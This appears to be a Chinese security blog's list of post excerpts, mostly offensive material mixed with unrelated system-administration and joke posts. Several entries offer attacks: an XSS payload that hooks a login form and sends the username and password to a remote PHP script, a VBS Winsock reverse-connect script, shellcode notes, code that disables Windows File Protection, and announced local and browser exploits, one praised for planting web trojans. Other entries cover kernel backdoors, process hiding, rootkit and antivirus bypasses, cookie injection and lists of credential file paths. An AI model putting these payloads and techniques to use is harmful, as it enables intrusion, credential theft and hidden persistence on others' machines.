1. 查找Kernel32.dll基地址;
2. 查找GetProcAddress()函数地址;
3. 查找其它API函数地址;
4. CreateProcess();
5. 远程连接。
我们都知道WINDOWS的系统功能不像UNIX的系统调用那样实现,由于WINDOWS版本的不断更新,使得系统调用对SHELLCODE几乎起不到作用。
但是WINDOWS是靠DLL动态链接库来实现,这就是说,如果能从KERNEL32.DLL中获取LoadLibrary()和GetProcAddress()函数的地址,我们就可以调用WINDOWS下的所有函数了。
所以我们需要对KERNEL32.DLL进行地址定位,这也是本文的目的。
................
阅读全文
摘要:
1.起因
C++程序员对try,catch,throw都应该很熟悉,能知道VC怎么实现它的人就不多了,不过网络世界使很多人知道了它与SEH (structured exception handling)有密切关系,我也不例外,也是在若干年前从网络知道了SEH,并且大致也知道SEH的流程.但是和多数人一样在我的实践也很少直接使用 SEH,对SEH也就仅限于网络上一些文章的介绍.曾经在用Windbg对某些软件作分析,我遇到了断点失效的情况,查找资料介绍是SEH中的 Handler清除了调试寄存器,在分析.....................
阅读全文
摘要: 本文描述了一些方法,可以饶过目前主流的现代Anti-rootkit工具,包括但不限于:
Icesword 最新版
Gmer最新版
Rootkit unhooker 最新版
DarkSpy 最新版
AVG Anti-rootkit最新版
等等
................
阅读全文
摘要: '搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷
'by 009, baicker@hotmail.com
'date:071221
Dim revdata
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )
set sc=createobject( "WScript.Shell" )
Set fso =CreateObject( "Scripting.FileSystemObject" )
sock.connect "127.0.0.1" , 1234
................
阅读全文
摘要:
众所周知,bo2k可以在一个指定的进程空间(比如explorer.exe进程)做为一个线程运行。本文试图找出一种方法,使得任意exe都可以在其他进程中以线程运行(当然,这里说的"任意"是有条件的,下面会讲到)。
为行文简单起见,我把先加载的exe称为宿主,后加载的exe称为客户。对于上面的例子,explorer.exe为宿主,bo2k.exe为客户。
基本知识
每一个exe都有一个缺省加载基址,一般都是0x400000。如果实际加载基址和缺省基址相同,程序中的重定位表就不需要修正(fixup),否则,就必须修正重定位表;
阅读全文
摘要: 之前的反弹sc有问题,请重新下载测试(071218)
阅读全文
摘要: secdrv local exp
winxp cn sp2, win2k3 cn sp1 测试通过
之前的版本只能xp下用,这个2k3也可以了,其实前段时间朋友给过我一个这个漏洞的1day,但是朋友的东西不能乱发,这个是自己写的,发出来大家恶心一下。 阅读全文
摘要: Win2k3_CN SP1 msjet40.dll ver 4.0.9025.0 测试成功
WinXP_CN SP2 msjet40.dll ver 4.0.8618.0 测试成功
mdb_d_exp.exe 为debug版本
mdb_r_exp.exe 为relrease版本
之前的反弹sc有问题,请重新下载测试(071218)
阅读全文
摘要: 注:Windows2000_CN SP2(我只有这台SP2的2k测试机),WindowsXP_CN SP2测试通过
网上流传的都TMD垃圾不能用,不知道抄来抄去转来转去哪些代码转错了
这个是我自己修改过的
阅读全文
摘要: 小改了一下代码,这下好用了
WinXP_CN SP2测试通过
Win2k3测试蓝屏,注意保存文件哦 阅读全文
摘要: 注:Windows2003_CN SP1 / WindowsXP_CN SP2 + RealPlay10.0 测试通过
好像10.5以下版本都中,这个似乎只能溢出一次,第一次溢出成功后,第二次开始会有realplay修复数据库的提示,点修复就中,取消不中
上次测试使用的"Windows 按钮突破专家" 4.5K 溢出没问题,但是"iecv.exe"那个87K
溢出的时候老是看不到界面,其实已经执行(进程中可以看到),不知道为什么(不知道是否大小问题)
另:IE5不中,代码中直接跳过了
阅读全文
摘要: 迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影响
挂马相当好用,只是如果用iframe,宽高不能为0
(pplayer.dll 组件版本号:1.2.3.49,CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F)
阅读全文
摘要: 本文一共介绍了七种javascript加密方法:
在做网页时(其实是网页木马呵呵),最让人烦恼的是自己辛辛苦苦写出来的客户端IE运行的javascript代码常常被别人轻易的拷贝,实在让自己的心里有点不是滋味,要知道自己写点东西也挺累的......^*^
但我们也应该清楚地认识到因为javascript代码是在IE中解释执行,要想绝对的保密是不可能的,我们要做的就是尽可能的增大拷贝者复制的难度,让他知难而退(但愿~!~),下面我结合自己这几年来的实践,及个人研究的心得,和大家一起来探讨一下网页中javascript代码的加密解密技术。
以加密下面的javascript代码为例:
......
阅读全文
摘要: VC- Project Setting-Debug-Project Option语法解释
-优化-
/O1 最小化空间 minimize space
/Op[-] 改善浮点数一致性 improve floating-pt consistency
/O2 最大化速度 maximize speed
/Os 优选代码空间 favor code space
/Oa 假设没有别名 assume no aliasing
/Ot 优选代码速度 favor code speed
/Ob 内联展开(默认 n=0) inline expansion (default n=0)
/Ow 假设交叉函数别名 assume cross-function aliasing
/Od 禁用优化(默认值) disable optimizations (default)
/Ox 最大化选项。(/Ogityb2 /Gs) maximum opts. (/Ogityb1 /Gs)
/Og 启用全局优化 阅读全文
摘要: 一、autorun.inf是windows下操纵光盘行为的一个文件,需要放在光盘根目录下,部分操作对于硬盘也适用。
二、autorun.inf是可以被禁止的。方法如下:
点击开始->运行,在文本框中输入regedit或者regedt32。依次展开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer,其中的NoDriveTypeAutoRun子键限制着Autorun的作用范围,默认为95(16进制)。
................
阅读全文
摘要: 1.最短的动态插入JS.
代码:
<x/**/style=xss:expression(document.appendChild(document.createElement('script')).src='xss.js')>
2.获取表单密码.
代码:
window.onload=function(){document.forms['login'].onsubmit=function(){var a=new Image();a.src="http://127.0.0.1/loveshell.php"+this.username.value+"&"+this.password.value;this.submit();}};
.......
阅读全文
摘要: 使用OD反汇编修改NateOn,虽然很麻烦,最终还是搞定了,后来发现网上有段代码,直接可以实现程序多开,测试了MSN、NateOn没问题,代码如下:
.386
.model flat, stdcall
option casemap :none
include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
............
阅读全文
摘要: 不说废话,且看怎么实现,我先拿SOHU BLOG做示范.
1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,\/前是真正的空格),在个人档案处看过滤了哪些.
’’;:!--"<javascript JAvaSCriPT>={()} \/
结果
’’;:!--"={()} // (&后是amp,论坛过滤了)
.........
阅读全文
摘要: 这是一个在内核模块中实现的反连后门,大家看看这于应用层上的实现有什么不同吧,呵呵
/*
* Kernel mode connect backdoor,haha~
*
* just a demo module to teach you how to write a backdoor in kernel mode,
* i belive you can add more code to make it strong and powerful,wulala.
*
* by wzt <wzt#xsec.org>
*
*/
阅读全文
摘要: 写程序麻烦,还要传上去,幸好VBS每台服务器应该都可以运行的吧,很少会又禁止的
使用SendKeys搞定
例如呼出Cain使用果如下脚本:)
Set WshShell= Wscript.CreateObject("Wscript.Shell")
Wscript.Sleep 1500
WshShell.SendKeys "%{PGUP}"
以下位SendKeys的相关使用方法等
............
阅读全文
摘要:
一些opcodes
by axis
2007-03-28
近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
简体中文windows的通用跳转地址:(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
..................
阅读全文
摘要: 更新:上次比较匆忙,有个函数没改好,今天才可以上网,现在没问题了
前段时间出了个radmin的算是技巧吧(http://www.blogjava.net/baicker/archive/2007/09/12/144609.html),以前也有过这个想法,只是没有去研究,这次索性修改了下源文件,直接改成利用hash登录的版本,省得每次带个od跑,针对屏幕相关的似乎不行,不过已经够用了呵呵
注:hash用小写字母(懒得改了)
http://www.blogjava.net/Files/baicker/Radmin_Hash.rar
阅读全文
摘要: Please note that this code and explanation was only released AFTER MySpace resolved this.
None of this would work on MySpace at the time it was released and it will not work now. Otherwise, there would have been mayhem.
Now, let's talk more about the problems encountered, workarounds, and how it worked in general.
1) Myspace blocks a lot of tags. In fact, they only seem to allow <a>, <img>s, and <div>s...maybe a few others (<embed>'s, I think). They would 阅读全文
摘要: "←"为ESC代码 ^YzFEu $
在用EDIT编辑批处理文件时可用下列方法输入ESC字符.首先同时按下Ctrl和P键 \?)@ #Qs
然后再按下作方括号,此时屏幕出现一左箭头,说明已输入了ESC字符.之后必须放 Jq)!)={
开Ctrl再次按下方括号键开始ANSI命令.
ESC[Ps;...;Psm
设置图形模式:调用由下列数值指定的图形函数,在该序列再次出现之前,这些被指定的函数保持激活状态。图形模式改变屏幕上显示的颜色和文本(例如:黑体和下划线字体)属性。
文本属性
值功能
------------------------------------
0 无属性
1 黑体
4 下划线字体(仅适用于单色显示适配器)
5 闪烁字体
..........
阅读全文
摘要: alsasound Alsa 声卡驱动程序支持。Alsa声卡驱动程序本来是为了一种声卡Gravis UltraSound(GUS)而写的,它和OSS/Free 及OSS/Linux兼容。
apmd 用来监视系统用电状态,并将相关信息通过syslogd 写入日志,也可以用来在电源不足时关机。一般用于笔记本电脑,若是台式机建议关闭。
atd 用At命令调度的任务,也在系统负荷比较低时运行批处理任务。
autofs 需要时自动转载文件系统,不需要时自动卸载。
chargen 端口chargen字符产生的缩写,输出一个可打印字符的旋转序列,用于测试字符终端设备。
chargen udp udp格式下端口chargen字符产生的缩写,输出一个可打印字符的旋转序列,用于测试字符终端设备。
crond 根据用户要求周期地运行调度的任务。它比较安全,配置简单,类似Windows中的计划任务。
dhcpd 提供了对动态主机控制协议(Dynamic Host Control Pro 阅读全文
摘要: cp_syn_retries :INTEGER
默认值是5
对于一个新建连接,内核要发送多少个 SYN 连接请求才决定放弃。不应该大于255,默认值是5,对应于180秒左右时间。(对于大负载而物理通信良好的网络而言,这个值偏高,可修改为2.这个值仅仅是针对对外的连接,对进来的连接,是由tcp_retries1 决定的)
tcp_synack_retries :INTEGER
默认值是5
对于远端的连接请求SYN,内核会发送SYN + ACK数据报,以确认收到上一个 SYN连接请求包。这是所谓的三次握手( threeway handshake)机制的第二个步骤。这里决定内核在放弃连接之前所送出的 SYN+ACK 数目。不应该大于255,默认值是5,对应于180秒左右时间。(可以根据上面的 tcp_syn_retries 来决定这个值)
tcp_keepalive_time :INTEGER
默认值是7200(2小时)
当keepalive打开的情况下,TCP发送keepalive消息的频率。(由于目前网络 阅读全文
摘要: Radmin 是一款很不错的服务器管理
无论是 远程桌面控制 还是 文件传输
速度都很快 很方便
这样也形成了 很多服务器都装了 radmin这样的
现在你说 4899默认端口 没密码的 服务器你上哪找?
大家都知道radmin的密码都是32位md5加密后
存放在注册表里的
具体的表键值为 HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\
那在攻陷一台web服务器时 大家 怎么能进一步提权?
如果你说 暴力破解 radmin 密码 呵呵 那也行
只不过 你要有足够的时间 跟精力
我想很少人 花上几星期 几月 甚至几年 去破解那个密码
............
阅读全文
摘要:
1、接电话时对着话筒说:你好,主人不在家,这里是电话录音,当你听到biu~~的一声时,请留言。biu~~(打入者楞住了)biu~~biu~~(……)biu~~靠!我都biu~~了怎么还不留啊!
2、接电话时说:对不起,您拨打的电话已关机或已离开服务区。
3、索性一接电话就发出嘟嘟嘟的声音。
4、接电话时对着话筒发出贞子般的呼气声。
5、接女生电话时说:王老五!拜托!装个娘娘腔我就听不出了吗?不要再骚扰我了,我正泡妞呢,再打过来小心我报警,告你打色情电话!
.............
阅读全文
摘要: 很多时候程序的 Debug 版本运行没有任何问题,但是一旦发布 Release 版本后,运行就出错,着实让人郁闷。大家知道,VC++ 中 Release 版本是对无法对源代码进行调试的。一般的做法是在怀疑有错误的代码前后插入MessageBox 函数,在函数中显示可能导致错误的变量的值。或者插入写文件的语句,输出可能导致错误的变量的值到一个记录文件。其实,除了上面讲的这个办法之外,还有其它的途径来调试 Release 版本的。下面就结合自己的经验和网上查找的一些资料给出调试 Release 版本的两个方法:
......
阅读全文
摘要: 基本概念
钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,在目标窗口处理函数之前处理它。钩子机制允许应用程序截获处理window消息或特定事件。
钩子实际上是一个处理消息的程序段,通过系统调用,把它挂入系统。每当特定的消息发出,在没有到达目的窗口前,钩子程序就先捕获该消息,亦即钩子函数先得到控制权。这时钩子函数即可以加工处理(改变)该消息,也可以不作处理而继续传递该消息,还可以强制结束消息的传递。
运行机制
1、钩子链表和钩子子程:
.......
阅读全文
摘要: 运行pl程序,提示:Can't locate DBI.pm in @INC,解决方法如下:
Install cygwin with these options:
- gcc (devel)
- make (devel)
- binutils (devel)
- Perl 5.8.6 (interpreters)
- Perl win32 API (libs)
- PostgreSQL (database)
installing DBI-1.48.tar.gz as follows:
- Unpack the kit into /usr/src (c:\cygwin\usr\src)
- Open a cygwin shell and cd to /usr/src/DBI-1.48
- perl Makefile.PL
- make
- make test
- make install
在cygwin的shell下执行相应pl文件,比如./ 阅读全文
摘要: 系统资源的占用情况
内存 —— 很理想。SQL占用的内存最大也没有超过65M,一般是在35M左右;asp.net占用的内存最大也没有超过40M,一般是在25M左右。
CPU:8%左右,由于访问次数不多,也不够集中,所以这个数值也说明不了什么。自己连续点了n次下一页,发现CPU的使用率飘高,达到了50%左右。
但是对于100万的记录,AMD XP2000+ 的CPU 几十毫秒的放映速度,因该是可以接受的,甚至是很理想的吧。
毕竟服务器的CPU要比我的快很多吧,而且记录也很难达到100万吧。
结果还是很满意的,但是美中不足的是,我想看一下海量访问的情况下的效果,
另外说明一下:前n页可以在60毫秒内完成,n应该是大于500的,小于多少嘛还没有测试。后n页就比较慢了,需要500毫秒左右。
下面讨论一下翻页的技巧吧。
我没有用游标、临时表、not in、in 这些方法,并不是说他们的效率不高,而是我还没有测试过。我只用了 top ,查了两次表。
大家也可提供一些其他的方法,我来测试一下,看看在100万条的情况下的效果。
< 阅读全文
摘要: 概述
在本例中,我们来实际编写一个可以在使用堆栈保护的系统中执行的shellcode。该shellcode通过利用ntdll.dll的部分指令跳转到我们的代码执行。在大多数的dll中都可以实现此方法,而且可以完全饶过堆栈保护机制,因为通过此方法并没有任何代码在堆栈非执行区域中执行。
详述
我们也许都听说过堆栈保护这么一个词。很多安全程序提供了对堆栈中的代码执行的保护功能(译者注:原文这里用的是“protect”,其实我个人认为用 “disallow”或者“disable”更确切的。因为这类所谓的堆栈保护,其实就是禁止代码在堆栈中执行。)。一些新的硬件产品也具有禁止代码在 “非执行”内存区域中执行(比如AMD64)。然而编写一个饶过此机制的shellcode并不是件难事,下面我给大家简单的介绍一下。
方法就是使用dll的部分代码来达到我们的目的。如何做到呢?首先在堆栈发生溢出的时候我们将返回地址设置成ntdll.dll中的某个指令地址,我们要利用的ntdll的部分代码如下:
.............
阅读全文
摘要: Editor:admin Time:2005-8-20 23:22 Read:9985 Score:8 Print
Writer:HSLY
Excerpt:80x86汇编小站
Preface:
分享逆向技术心德......
Content:
[标题] 教你如何分析未文档化的数据结构
[作者] hsly110 或者 猪头三
[个人网站] http://www.x86asm.com 80x86汇编小站
[Email] pliceman_110@163.com PS:本文如果有错漏请来信指出
[范围] 逆向工程
[目的] 分享逆向技术心德
[目标API] 未文档化的RtlInitializeGenericTable
[参考文献] Secrets of Reverse Engineering
..........
阅读全文
摘要: /usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/my.cnf //mysql的配置文件
/etc/issue //系统版本
/etc/issue.net
/etc/redhat-release
C:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
/etc/sysconfig/iptables //从中得到防火墙规则策略
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Serv-U\Serv 阅读全文
摘要:
The problem: you use terminal services in administration mode (which allows 2 sessions), now you cannot connect to the server because all sessions are used.
Windows 2000+ (includes Windows XP and 2003) have two command-line tools called qwinsta and rwinsta that can query and reset a remote session.
Query a server:
> qwinsta /server:192.168.12.12
.......
阅读全文
摘要:
I had to create a .VBS script to create an automated E-Mail message. The hardest part was to set the importance of the mail, I've found the solution here: http://www.lewisroberts.com/?p=64
Here come's the script:
Dim iMsg
Dim iConf
Dim Flds
Dim strHTML
............
阅读全文
摘要:
Standard user's in big companies usually runs as unprivileged users, thus they cannot execute admin tasks. But sometimes it's necessary to run a task with admin rights (automated software deploy) - runas, in some situations, is a bad idea because it needs a user and a clear text password (and no, the password compiled in an exe file is not very safe!).
......
阅读全文
摘要: Most new Servers or Workstations aren't equipped with a floppy drive anymore, but from time to time I need to boot from a floppy drive. And I don't want to burn a CD each time I need to boot from a floppy drive.. so the solution is tftpd32 and PXELINUX. With those 2 tools I'm able to boot disk images from the LAN.
You need tftpd32 from Ph. Jounin (http://tftpd32.jounin.net/) and PXELINUX, which is a part of the SYSLINUX package (http://syslinux.zytor.com).
阅读全文
摘要:
#include <windows.h>
#include <gdiplus.h>
#include <stdio.h>
#pragma comment(lib,"gdiplus.lib")
using namespace Gdiplus;
INT GetEncoderClsid(const WCHAR* format, CLSID* pClsid); // helper function
...........
阅读全文
摘要: Terminal Service: Connect and/or Shadow to a Console Session...
crosspost from http://blogs.msdn.com/rextang
Seems some of my friends still didn't know how to use Microsoft Terminal Service Client to connect to the console session of a windows pc (server or client OS) so here is a memo for it also during the search I found the other interesting thing that can let Terminal Service to function like a VNC server (2 users share the same session, called "shadow session" here).
..... 阅读全文
摘要: 堡耳机的方法
一般来说,新买来的好点的耳机都需要堡,堡了以后才能有比较好的音质。
堡耳机的步骤如下:
1.正常听音量的1/3驱动耳机24小时(100-10kHz)
2.正常听音量的2/3驱动耳机24小时(50-15kHz)
3.正常听音量驱动耳机72小时(20-20kHz)
4.正常听音量的3/4驱动耳机24小时(20-20K)
5.正常听音量听歌 阅读全文
摘要: 进程隐藏的两种方法
这两种都是很古老的方法,因为无聊,所以写了一下。代码在XP_SP2下调试通过.
(1).从活动进程链表(ActiveProcessLinks)中摘除自身,这种方法可以欺骗任务管理器,
下面这个程序做的就是双向链表的删除节点和插入节点,十分的简单。
(2).如果你反汇编taskmgr.exe,可以在发现taskmgr.exe是通过NtQuerySystemInformation枚举进程的,
因此可以通过挂钩系统服务NtQuerySystemInformation修改这个函数的行为,从而实现在任务管理器中隐藏进程的目的,下面就是实现代码。
...........
阅读全文
摘要: .386
.model flat, stdcall
option casemap:none
;**************************************************************************************************
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\ntoskrnl.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac
;**************************************************************************************************
阅读全文
摘要: Set wmiServices = GetObject("winmgmts:root/default")
Set wmiSink = WScript.CreateObject("WbemScripting.SWbemSink", "SINK_")
wmiServices.ExecNotificationQueryAsync wmiSink, _
"SELECT * FROM RegistryKeyChangeEvent WHERE Hive='HKEY_LOCAL_MACHINE' AND " & _
"KeyPath='SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'"
WScript.Echo "Listening..." & vbCrLf
While(1)
WScript.Sleep 1000
Wend
Sub SINK_OnObjectReady(wmiObject, wmiAsyncContext)
WScript.Echo "R 阅读全文
摘要: 例:
http://xxxx/view.asp?id=1
先访问http://xxxx/view.asp?id=1
接着在浏览器里输入:
javascript:alert(document.cookie="id="+escape("1 and 1=1"))
再访问http://xxxx/view.asp(未出错)
再输入:javascript:alert(document.cookie="id="+escape("188 and 1=2"))
再访问:http://xxxx/view.asp(出错)
该页面出错就表示可以用Cookie注入。
..........
阅读全文
摘要: #include <stdio.h>
#include <windows.h>
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);
void Disable_WFP()
{
HINSTANCE hmod=LoadLibrary("sfc_os.dll");
CPP SetSfcFileException;
// the function is stored at the fifth ordinal in sfc_os.dll
SetSfcFileException= (CPP)GetProcAddress(hmod,(LPCSTR)5);
SetSfcFileException(0, L"c:\\windows\\system32\\calc.exe",-1);
//Now we can modify the system file in a complete stealth. 阅读全文
摘要: 有时候我们希望能够动态监视系统中任意进程/线程的创建与销毁。为了达
到此目的我翻阅了 DDK 手册,发现其提供的 PsSetCreateProcessNotifyRoutine(),
PsSetCreateThreadNotifyRoutine(),等函数可以实现此功能。这两个函数可以
通过向系统注册一个 CALLBALCK 函数来监视进程/线程等操作。函数原形如下:
NTSTATUS
PsSetCreateProcessNotifyRoutine(
IN PCREATE_PROCESS_NOTIFY_ROUTINE NotifyRoutine,
IN BOOLEAN Remove
);
......................
阅读全文
摘要: 1,SSDT
SSDT即系统服务描述符表,它的结构如下(参考《Undocument Windows 2000 Secretes》第二章):
typedef struct _SYSTEM_SERVICE_TABLE
{
PVOID ServiceTableBase; //这个指向系统服务函数地址表
PULONG ServiceCounterTableBase;
ULONG NumberOfService; //服务函数的个数,NumberOfService*4 就是整个地址表的大小
ULONG ParamTableBase;
}SYSTEM_SERVICE_TABLE,*PSYSTEM_SERVICE_TABLE;
.........
阅读全文
摘要:
通过对 NtReadVirtualMemory 挂钩,防止其他进程对保护的模块进行扫描,
如果发现其他进程读被保护模块的内存,则返回0
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
.........
阅读全文
摘要:
目录:
反主动防御rootkit的产生背景及其必要性
反网络访问主动防御
反API钩子进程行为主动防御
反系统Notify进程行为主动防御
绕过监控进入ring0安装驱动
实用级反主动防御rootkit的通用性问题
..............
阅读全文
摘要:
API HOOK估计没必要多介绍了,简单的来讲就是通过某种方式来改变API函数的工作流程.一般来讲有两种方法:IAT HOOK和INLINE HOOK.前一种应用较为广泛,一方面因为简单,还一方面因为稳定.他的原理就是改写进程空间中要HOOK的API所在模块的函数引入表,使之指向替换原 API函数的函数地址(某些木马就是利用IAT HOOK的方式,挂钩NtQuerySystemInformation的方式来实现进程隐藏).这里感觉还是有必要再说一点INLINE HOOK,这个复杂点,直接进入被HOOK的API函数内部去修改他,采用指令call或者jmp等,迫使API改变流程,跳到自己的替换函数中.通常都是在函数头部前10个字节内修改.
...............
阅读全文
摘要: 1.得到本进程中包含被挂接API的DLL的基地址,该DLL代码节的虚拟偏移以及该API的入口地址.API入口地址-(代码节虚拟偏移+DLL基地址)=函数入口相对于代码节的偏移
2.得到目标进程的PID,以及目标进程包含被挂接API的DLL的基地址(注意一般来说和前面自身进程的值相同)前面得到的函数入口偏移+DLL基地址+代码节虚拟偏移=目标进程API函数入口地址
3.打开目标进程读目标进程API函数入口处128字节代码到自身进程的变量中.然后调用z0mbie写的LDE32库取该API函数入口处几个指令的长度当长度>=5时保存该长度(这样防止后面取指令没有对齐)
4.为我们的假函数在目标进程加载的DLL中分配空间(我是把代码写在PE头的后面)这儿要改该内存的属性为读写执行(PAGE_EXECUTE_READWRITE).为了方便编译我们的假函数是写在代码段中的,在运行时要把这些代码移到数据段,然后把第3步取出的指令放在数据段中相应的偏移处.同时还要在数据段中设置跳回真实函数的JMP指令.
5.把真正的API开头的指令改为JMP到我们的假函数中.
. 阅读全文
摘要:
一个操作系统的可执行文件格式在很多方面是这个系统的一面镜子。虽然学习一个可执行文件格式通常不是一个程序员的首要任务,但是你可以从这其中学到大量的知识。在这篇文章中,我会给出 MicroSoft 的所有基于 win32系统(如winnt,win9x)的可移植可执行(PE)文件格式的详细介绍。在可预知的未来,包括 Windows2000 , PE 文件格式在 MicroSoft 的操作系统中扮演一个重要的角色。如果你在使用 Win32 或 Winnt ,那么你已经在使用 PE 文件了。甚至你只是在 Windows3.1 下使用 Visual C++ 编程,你使用的仍然是 PE 文件(Visual C++ 的 32 位 MS-DOS 扩展组件用这个格式)。简而言之,PE 格式已经普遍应用,并且在不短的将来仍是不可避免的。现在是时候找出这种新的可执行文件格式为操作系统带来的东西了。
我最后不会让你盯住无穷无尽的十六进制Dump,也不会详细讨论页面的每一个单独的位的重要性。代替的,我会向你介绍包含在 PE 文件中的概念,并且将他们和你每天都遇到的东西联系起来。比如,线程局部变量 阅读全文
摘要: 许多关于字符串的问题,在文章最后的参考文章中,相信有更加深入和精确的描述。不过关于中文的处理,我想先补充一些自己的看法。
背景:WIN32 console程序,使用printf输出字符串。相信许多人都有使用过。
平台:VisualStudio.NET 2003(MFC 7.1)。
MBCS UNICODE
蔡 b2 cc 21 85
A 41 00 41 00
程序段1:使用std::string
#include
.........
阅读全文
摘要: 1、PE文件框架构成
DOS MZ header
DOS stub
PE header
Section table
Section 1
Section 2
Section ...
Section n
上表是PE文件结构的总体层次分布。所有 PE文件(甚至32位的 DLLs) 必须以一个简单的 DOS MZ header 开始,在偏移0处有DOS下可执行文件的“MZ标志”,有了它,一旦程序在DOS下执行,DOS就能识别出这是有效的执行体,然后运行紧随 MZ header 之后的 DOS stub。DOS stub实际上是个有效的EXE,在不支持 PE文件格式的操作系统中,它将简单显示一个错误提示,类似于字符串 " This program cannot run in DOS mode " 或者程序员可根据自己的意图实现完整的 DOS代码。通常DOS stub由汇编器/编译器自动生成,对我们的用处不是很大,它简单调用中断21h服务9来显示字符串"This program cannot run in DOS mode"。 阅读全文
摘要:
1.1 引言 1.2 内存管理概述 1.3 虚拟内存访问
1.4 文件的内存映射 1.4 文件的内存映射(2) 1.5 深入认识指针的真正含义
1.6 本章小结 参考文献
第2章 再谈PE文件结构
2.1 引言 2.2 PE文件格式概述 2.3 PE文件结构
2.3 PE文件结构 2.4 如何获取PE文件中的OEP 2.5 PE文件中的资源
2.6 一个修改PE可执行文件的完整实例(1) 2.6 一个修改PE可执行文件的完整实例(2) 2.7 本章小结
参考文献
第3章 进程之间通信概述及初级技术
3.1 引言 3.2 进程通信概述 3.3 使用自定义消息通信
3.4 使用WM_COPYDATA消息通信 3.4 使用WM_COPYDATA消息通信 3.5 使用内存读写函数和内存映射文件通信
3.6 使用动态链接库通信 3.7 使用Windows剪贴板通信 3. 阅读全文
摘要: Tiny PE
Creating the smallest possible PE executable
This work was inspired by the Tiny PE challenge by Gil Dabah. The object of the challenge was to write the smallest PE file that downloads a file from the Internet and executes it.
In the process of writing increasingly smaller PE files for the challenge I learned a lot of interesting details about the PE file format and the Windows loader. The goal of this document is to preserve this knowledge for future reference. In t 阅读全文
摘要:
/*
Author: void#ph4nt0m.org
*/
// 编译器 cl.exe(Visual C++ 6.0)
// 没有做任何优化情况下,编译大小为:16K
// 编译优化后: 1K (用16进制编辑器把尾部的0x00去掉: 712bytes)
#include
#pragma comment(lib,"kernel32.lib")
// 作用: 指定节对齐为512字节
#pragma comment(linker, "/align:512")
..........
阅读全文
摘要: 我们在Code project(www.codeproject.com)上可以找到许多密码间谍程序(译者注:那些可以看到别的程序中密码框内容的软件),他们都依赖于Windows钩子技术。要实现这个还有其他的方法吗?有!但是,首先,让我们简单回顾一下我们要实现的目标,以便你能弄清楚我在说什么。
要读取一个控件的内容,不管它是否属于你自己的程序,一般来说需要发送 WM_GETTEXT 消息到那个控件。这对edit控件也有效,但是有一种情况例外。如果这个edit控件属于其他进程并且具有 ES_PASSWORD 风格的话,这种方法就不会成功。只有“拥有(OWNS)”这个密码控件的进程才可以用 WM_GETTEXT 取得它的内容。所以,我们的问题就是:如何让下面这句代码在其他进程的地址空间中运行起来:
::SendMessage( hPwdEdit, WM_GETTEXT, nMaxChars, psBuffer );
一般来说,这个问题有三种可能的解决方案:
1. 把你的代码放到一个DLL中;然后用 wind 阅读全文
摘要:
0序文
也许你想要了解一个病毒,注入到程序内部并且感染他的方法,或者你对保护你特殊的PE文件的数据感兴趣。你能使用这篇文章的源代码构建你自定义的EXE BUILDER。如果用在好的方面,他能教你怎样保护或封装加密你的PE文件,但是同样如果你用在邪恶的方面,他能产生一个病毒。然而,我写这篇文章的目的是前者,所以,我不会为不道德的使用负责。
1预备知识
按照主题这篇文章不需要特殊的预备知识,如果你已经了解了DEBUGGER和文件结构,那么我建议你跳过2,3部分,这两部分是为毫无基础的人准备的。
2.PE文件的结构
规定PE文件的结构为WINDOWS OS提供了最好的方式去执行代码,并且储存一个程序运行所需要的基本数据。例如常量,变量等等。
................
阅读全文
摘要: 1、增加接口。在OcciDml.hpp中增加extern "C" int __declspec(dllexport) funA(char* a); 在OcciDml.cpp中将函数声明修改为extern "C" int __declspec(dllexport) funA(char* a)
2、修改头文件。在需要引入的所有类中,替换为
#ifndef OCCI_ORACLE
#define WIN32COMMON
#include "occi.h"
using namespace oracle::occi;
using namespace std;
#endif
否则会出现错误如下:
d:\oracle\ora92\oci\include\occicontrol.h(1132) : error C2995: 'getVector' : template function has already been defined
d:\oracle\ora92\oci\include\occicommon 阅读全文
摘要:
一,一般来讲,加密就是加壳
我们经常考虑,一个可执行文件,怎么样加密才能安全呢?
一般用的手段,是加壳。加壳工具的工作原理,就是把可执行文件的代码与
数据都进行加密变换,作为数据存放。生成的目标文件入口代码是加壳软件
准备好的防跟踪代码。经过漫长的防跟踪代码后,会把原始可执行文件的代码
与数据段恢复,然后跳转到原来的入口处,继续运行。这样做的缺点是,不管
你的加密多强,防跟踪代码多牛,只要一运行,在内存中就全部恢复了。只要
把内存映象dump下来,反汇编一下,就清清楚楚了。甚至有工具可以直接把
dump下来的内存映象存为可执行文件。这样加密就彻底失败了。
...... 阅读全文
摘要:
